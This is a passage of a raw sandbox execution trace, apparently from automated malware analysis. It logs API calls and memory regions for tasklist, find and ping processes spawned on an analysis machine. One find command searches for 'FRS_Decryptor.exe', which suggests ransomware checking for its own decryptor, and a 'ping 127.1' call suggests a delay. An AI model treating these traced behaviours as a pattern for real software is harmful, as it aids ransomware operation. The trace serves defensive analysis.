0x0 [0138.477] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xa8fa18 | out: lpExitCode=0xa8fa18*=0x0) returned 1 [0138.477] CloseHandle (hObject=0x64) returned 1 [0138.477] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0138.479] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xa8fa18 | out: lpExitCode=0xa8fa18*=0x0) returned 1 [0138.479] CloseHandle (hObject=0x60) returned 1 [0138.479] _get_osfhandle (_FileHandle=1) returned 0x2ec [0138.479] SetConsoleMode (hConsoleHandle=0x2ec, dwMode=0x0) returned 0 [0138.479] _get_osfhandle (_FileHandle=1) returned 0x2ec [0138.479] GetConsoleMode (in: hConsoleHandle=0x2ec, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0138.479] _get_osfhandle (_FileHandle=0) returned 0x24 [0138.479] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0138.479] SetConsoleInputExeNameW () returned 0x1 [0138.480] GetConsoleOutputCP () returned 0x1b5 [0138.480] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0138.480] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.480] exit (_Code=0) Process: id = "152" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0xf1ee000" os_pid = "0x924" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "151" os_parent_pid = "0x944" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7799 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 7800 start_va = 0x630000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 7801 start_va = 0x650000 end_va = 0x651fff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 7802 start_va = 0x660000 end_va = 0x66efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 7803 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 7804 start_va = 0x6b0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 7805 start_va = 0x6f0000 end_va = 0x6f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 7806 start_va = 0x700000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 7807 start_va = 0x710000 end_va = 0x711fff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 7808 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7809 start_va = 0x7fca0000 end_va = 0x7fcc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fca0000" filename = "" Region: id = 7810 start_va = 0x7fcc6000 end_va = 0x7fcc6fff entry_point = 0x0 region_type = private name = "private_0x000000007fcc6000" filename = "" Region: id = 7811 start_va = 0x7fccc000 end_va = 0x7fccefff entry_point = 0x0 region_type = private name = "private_0x000000007fccc000" filename = "" Region: id = 7812 start_va = 0x7fccf000 end_va = 0x7fccffff entry_point = 0x0 region_type = private name = "private_0x000000007fccf000" filename = "" Region: id = 7813 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7814 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7815 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7816 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7836 start_va = 0x7d0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 7837 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7838 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7839 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7844 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 7845 start_va = 0x640000 end_va = 0x643fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 7846 start_va = 0x720000 end_va = 0x79dfff entry_point = 0x720000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7847 start_va = 0x7e0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 7848 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 7849 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 7850 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 7851 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 7852 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 7853 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7854 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7855 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 7856 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7857 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7858 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7859 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7860 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7861 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7862 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7863 start_va = 0x7fba0000 end_va = 0x7fc9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fba0000" filename = "" Thread: id = 422 os_tid = 0x8c0 Thread: id = 424 os_tid = 0x8ec Thread: id = 425 os_tid = 0x918 Thread: id = 426 os_tid = 0x904 Process: id = "153" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0xfbbd000" os_pid = "0x930" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "151" os_parent_pid = "0x944" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7818 start_va = 0x180000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 7819 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 7820 start_va = 0x1b0000 end_va = 0x1befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7821 start_va = 0x1c0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 7822 start_va = 0x200000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 7823 start_va = 0x240000 end_va = 0x243fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 7824 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 7825 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 7826 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 7827 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7828 start_va = 0x7f450000 end_va = 0x7f472fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f450000" filename = "" Region: id = 7829 start_va = 0x7f47b000 end_va = 0x7f47dfff entry_point = 0x0 region_type = private name = "private_0x000000007f47b000" filename = "" Region: id = 7830 start_va = 0x7f47e000 end_va = 0x7f47efff entry_point = 0x0 region_type = private name = "private_0x000000007f47e000" filename = "" Region: id = 7831 start_va = 0x7f47f000 end_va = 0x7f47ffff entry_point = 0x0 region_type = private name = "private_0x000000007f47f000" filename = "" Region: id = 7832 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7833 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7834 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7835 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7840 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 7841 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7842 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7843 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 423 os_tid = 0x8a8 Process: id = "154" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0xfb06000" os_pid = "0x8fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7864 start_va = 0x280000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7865 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7866 start_va = 0x2b0000 end_va = 0x2befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7867 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 7868 start_va = 0x300000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 7869 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 7870 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 7871 start_va = 0x360000 end_va = 0x361fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 7872 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 7873 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7874 start_va = 0x7e7b0000 end_va = 0x7e7d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7b0000" filename = "" Region: id = 7875 start_va = 0x7e7d9000 end_va = 0x7e7d9fff entry_point = 0x0 region_type = private name = "private_0x000000007e7d9000" filename = "" Region: id = 7876 start_va = 0x7e7dc000 end_va = 0x7e7defff entry_point = 0x0 region_type = private name = "private_0x000000007e7dc000" filename = "" Region: id = 7877 start_va = 0x7e7df000 end_va = 0x7e7dffff entry_point = 0x0 region_type = private name = "private_0x000000007e7df000" filename = "" Region: id = 7878 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7879 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7880 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7881 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7882 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 7883 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7884 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7885 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7886 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 7887 start_va = 0x290000 end_va = 0x293fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7888 start_va = 0x370000 end_va = 0x3edfff entry_point = 0x370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7889 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 7890 start_va = 0x890000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 7891 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 7892 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 7893 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7894 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7895 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7896 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7897 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7898 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7899 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7900 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7901 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7902 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7903 start_va = 0x7e6b0000 end_va = 0x7e7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6b0000" filename = "" Region: id = 7904 start_va = 0x3f0000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 7905 start_va = 0x430000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 7906 start_va = 0x7e7d6000 end_va = 0x7e7d8fff entry_point = 0x0 region_type = private name = "private_0x000000007e7d6000" filename = "" Region: id = 7907 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 7908 start_va = 0x2a0000 end_va = 0x2a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7909 start_va = 0x470000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7910 start_va = 0x480000 end_va = 0x482fff entry_point = 0x480000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 7911 start_va = 0x4c0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 7912 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7913 start_va = 0x7e7d3000 end_va = 0x7e7d5fff entry_point = 0x0 region_type = private name = "private_0x000000007e7d3000" filename = "" Thread: id = 427 os_tid = 0x8ac [0138.531] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0138.531] __set_app_type (_Type=0x1) [0138.531] __p__fmode () returned 0x76ea1768 [0138.531] __p__commode () returned 0x76ea176c [0138.531] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0138.531] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0138.531] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.532] _fileno (_File=0x76ea4c28) returned 1 [0138.532] _get_osfhandle (_FileHandle=1) returned 0x28 [0138.532] GetFileType (hFile=0x28) returned 0x2 [0138.532] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f240 | out: lpMode=0x33f240) returned 0 [0138.533] GetLastError () returned 0x6 [0138.533] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f1a4, nSize=0x50 | out: lpBuffer="䤐]") returned 0x0 [0138.533] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0138.535] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x33f25c | out: phkResult=0x33f25c*=0x88) returned 0x0 [0138.535] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x33f250, lpData=0x33f258, lpcbData=0x33f254*=0x4 | out: lpType=0x33f250*=0x0, lpData=0x33f258*=0x0, lpcbData=0x33f254*=0x4) returned 0x2 [0138.535] RegCloseKey (hKey=0x88) returned 0x0 [0138.535] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x33f220*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x33f25c | out: ppResult=0x33f25c*=0x5dc138*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5d8a30*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0138.535] FreeAddrInfoW (pAddrInfo=0x5dc138*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5d8a30*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0138.535] IcmpCreateFile () returned 0x5d6d40 [0138.538] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x5dc250 [0138.538] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x5e5270 [0138.538] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x33f358, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0138.539] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="竈^ﰤ3┗\x94䰨盪❋") returned 0x14 [0138.540] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.540] _fileno (_File=0x76ea4c28) returned 1 [0138.540] _get_osfhandle (_FileHandle=1) returned 0x28 [0138.540] GetFileType (hFile=0x28) returned 0x2 [0138.540] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0138.540] GetLastError () returned 0x6 [0138.540] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3❋") returned 0x0 [0138.540] _fileno (_File=0x76ea4c28) returned 1 [0138.540] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0138.540] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 